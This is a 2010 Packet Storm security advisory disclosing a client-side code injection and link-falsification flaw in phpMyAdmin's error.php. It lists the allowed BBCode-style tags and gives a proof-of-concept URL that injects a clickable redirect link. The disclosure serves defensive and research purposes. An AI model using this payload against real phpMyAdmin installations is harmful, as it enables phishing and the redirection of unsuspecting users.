what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpMyAdmin Client Side Code Injection

phpMyAdmin Client Side Code Injection
Posted Dec 6, 2010
Authored by Emanuele Gentili, white_sheep, Alessandro Scoscia

phpMyAdmin suffers from client side code injection and redirect link falsification vulnerabilities.

tags | exploit, vulnerability
SHA-256 | 1909f0c63f7acbf171fbb40d96182a3ac8dfc8931cca96fca2ea11b4f539118b

phpMyAdmin Client Side Code Injection

Change Mirror Download
PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

Credits:
Emanuele 'emgent' Gentili <emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia <scox@backtrack.it>


In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.
With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.
Available tags are:


'[i]' => '<em>',
'[/i]' => '</em>',
'[em]' => '<em>',
'[/em]' => '</em>',
'[b]' => '<strong>',
'[/b]' => '</strong>',
'[strong]' => '<strong>',
'[/strong]' => '</strong>',
'[tt]' => '<code>',
'[/tt]' => '</code>',
'[code]' => '<code>',
'[/code]' => '</code>',
'[kbd]' => '<kbd>',
'[/kbd]' => '</kbd>',
'[br]' => '<br />',
'[/a]' => '</a>',
'[sup]' => '<sup>',
'[/sup]' => '</sup>',

and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '<a href="\1" target="\2">'


POC:

http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]


OWASP Reference:

http://www.owasp.org/index.php/Unvalidated_Input

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close